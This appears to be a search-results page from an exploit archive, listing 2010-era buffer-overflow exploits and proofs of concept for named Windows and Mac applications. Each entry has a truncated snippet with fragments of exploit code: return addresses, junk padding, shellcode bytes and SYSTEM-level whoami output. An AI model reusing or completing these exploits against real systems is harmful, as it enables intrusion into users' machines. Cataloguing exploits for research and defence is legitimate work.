493 matches found
Winamp 5.572 whatsnew.txt SEH (meta)
Exploit for windows platform in category local exploits. Winamp 5.572 whatsnew.txt SEH meta. Title: Winamp 5.572 whatsnew.txt SEH MSF Author: Blake Published: 2010-04-15 Tested on Windows XP SP3 This file is part of the...
PHP 6.0 Dev str_transliterate() Buffer Overflow
whoami whoami nt authority\system / errorreporting0; $bases = $GET'poss'; $basee = $GET'pose'; $offs = $GET'offs'; $offe = $GET'offe'; ifinigetbool'unicode.semantics' $buff = strrepeat"\u4141", 32; $tbp = "\u2650\u6EE5"; // 6EE52650 ADDRESS TO BE PATCHED BY WPM $ptw = "\u2FE0\u6EE5"; // 6EE52FE0...
Mocha LPD 1.9 - Remote Buffer Overflow (Denial of Service) (PoC)
!/usr/bin/python Mocha LPD v1.9 Remote Heap Overflow Exploit ol skool 'write 4' whoops, I said it was a DoS. My bad. btw yes, I know its 2010 :0 CVE: 2010-1687 tested on XP sp1 use anti debugging to see it work - !hidedebug zwqueryinformationprocess call trace: ntdll.RtlAllocateHeap Called...
Easy Ftp Server v1.7.0.2 MKD Remote Post-Authentication BoF Exploit
No description provided by source. include stdio.h include stdlib.h include string.h include sys/socket.h include netinet/in.h // // EasyFtp Server v1.7.0.2 MKD Remote Post-Authentication BoF Exploit // 11470x90c.c // // Date: 24/03/2010 // Author: x90c x90c.org // // Discovered by: loneferret //...
Yahoo Player 1.0 - '.m3u' Local Buffer Overflow
Title: Yahoo Player v1.0 .m3u Buffer Overflow Exploit direct EIP overwrite Date: 2010-03-07 Author: BombardMr. tro0oqy originally discovered it, and gave a SEH Version:1.0 Tested on: Windows XP SP2 CVE: my $file="crash.m3u"; my $junkA="A"x2080; my $eip=pack'V',0x7c80ae31; eip my $junkC="C"x12;...
ProSSHD v1.2 20090726 Buffer Overflow Exploit
No description provided by source. Author: S2 Crew Hungary Tested on: Windows XP SP2 EN CVE: - Registers: EAX 000003E4 ECX 0012ED44 EDX 7C90EB94 ntdll.KiFastSystemCallRet EBX 00000674 ESP 0012EFC0 ASCII "BBBBBBBBBBBBBBBBBB..." EBP 0012F3DC ASCII "BBBBBBBBBBBBBBBBBB..." ESI 7C81DD9A...
ProSSHD v1.2 20090726 Buffer Overflow Exploit
Exploit for unknown platform in category remote exploits. ProSSHD v1.2 20090726 Buffer Overflow Exploit. Author: S2 Crew Hungary Tested on: Windows XP SP2 EN CVE: - Registers: EAX 000003E4 ECX 0012ED44 EDX...
ProSSHD 1.2 20090726 - Remote Buffer Overflow
ProSSHD 1.2 20090726 - Remote Buffer Overflow Author: S2 Crew Hungary Tested on: Windows XP SP2 EN CVE: - Registers: EAX 000003E4 ECX 0012ED44 EDX 7C90EB94 ntdll.KiFastSystemCallRet EBX 00000674 ESP 0012EFC0 ASCII "BBBBBBBBBBBBBBBBBB..." EBP 0012F3DC ASCII "BBBBBBBBBBBBBBBBBB..." ESI 7C81DD9A...
Media Player Classic 6.4.9.1 Buffer Overflow
!/usr/bin/perl Media Player Classic 6.4.9.1 .avi Buffer Overflow Exploit Homepage: http://www.sourceforge.net/projects/guliverkli2/ Exploit Coded by: cr4wl3r From: Indonesia WARNING - WARNING - WARNING - WARNING Disclaimer: The author published the information under the condition that is not in t...
Apple iTunes 9.0.1 - '.pls' Handling Buffer Overflow
Exploit Title: iTunes .pls file handling buffer overflow Date: 2009.12.20 Author: S2 Crew Hungary Software Link: - Version: 9.0 Tested on: OSX 10.5.8, Windows XP SP2 /GS flag, DOS CVE: CVE-2009-2817 Code: !/usr/bin/env ruby SETJMP = 0x92F04224 JMPBUF = 0x8fe31290 STRDUP = 0x92EED110 8fe24459 jmp...
OtsTurntables Free 1.00.047 - .olf Universal Buffer Overflow
OtsTurntables Free 1.00.047 - .olf Universal Buffer Overflow !/usr/bin/python OtsTurntables Free v1.00.047 .olf Universal Buffer Overflow Exploit Date: 14-01-2010 Author: mrme Software Link: http://www.otsturntables.com/download-otsturntables-free/ Version: 1.00.047 Tested on: Windows XP sp3...
Ollydbg 2.00 Beta1 - Local Buffer Overflow
Exploit Title: Ollydbg 2.00 Beta1 Local Buffer Overflow Exploit Date: 2010-02-15 Author: SuBz3r0 Software Link: http://www.ollydbg.de/version2.html Version: 2.00 Beta 1 Tested on: XP SP3 CVE : if exists Code : Ollydbg2 v2.00 beta1 Exploit in Python print "" print "" print " SuBz3r0 " print "" pri...
UltraISO 9.3.6.2750 Local Buffer Overflow POC (0day)
Exploit for unknown platform in category dos / poc. UltraISO 9.3.6.2750 Local Buffer Overflow POC 0day. /ccd overflow string=10974 bytes img file size=109974 bytes ccd file size=11812 / include...
UltraISO 9.3.6.2750 Local Buffer Overflow Exploit (0day)
Exploit for unknown platform in category local exploits. UltraISO 9.3.6.2750 Local Buffer Overflow Exploit 0day. / Ultraiso local buffer overflow exploit0day This 0day is kickass from f...
Core-FTP-Server
The vulnerability can be triggered by convincing a user to submit an overly long String for the SSH password. The buffer is unchecked, resulting in control of the instruction pointer, allowing for arbitrary code injection. sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"...
Deepburner pro 1.9.0.228 dbr file Buffer Overflow Exploit (Universal)
Exploit for unknown platform in category local exploits. Deepburner pro 1.9.0.228 dbr file Buffer Overflow Exploit Universal. / Deepburner pro 1.9.0.228 dbr fi...
PlayMeNow (Windows XP SP2 French) - '.M3U' Playlist Buffer Overflow
//Exploit Title: PlayMeNow...
SimplePlayer 0.2 Denial Of Service
!/usr/bin/python Title: SimplePlayer v0.2 0day .wav overflow DOS Exploit Found by: mrme seeleymagic at hotmail dot com Greetz to: Corelan Security Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT Tested on: Windows XP SP3 Happy New Year! POC: crash = "x41" 36000; overwrite the buffer at 262 bytes tr...
Mini-stream Ripper 3.0.1.1 - '.pls' Universal Local Buffer Overflow
/ riptheministreamripper.c Mini-stream ripper = 3.0.1.1 .pls Local Universal Buffer Overflow Exploit exploited by: mrme Greetz to the Corelan Security Team: corelanc0d3r, rick, edi, dellnull, marko T, phifli, corelanc0d3r Visit: corelanc0d3r's blog http://www.corelan.be:8800/ reference:...
Mini-stream ripper => 3.0.1.1 (.pls) Local Universal Buffer Overflow Exploit
No description provided by source. / riptheministreamripper.c Mini-stream ripper = 3.0.1.1 .pls Local Universal Buffer Overflow Exploit exploited by: mrme Greetz to the Corelan Security Team: corelanc0d3r, rick, edi, dellnull, marko T, phifli, corelanc0d3r Visit: corelanc0d3r's blog...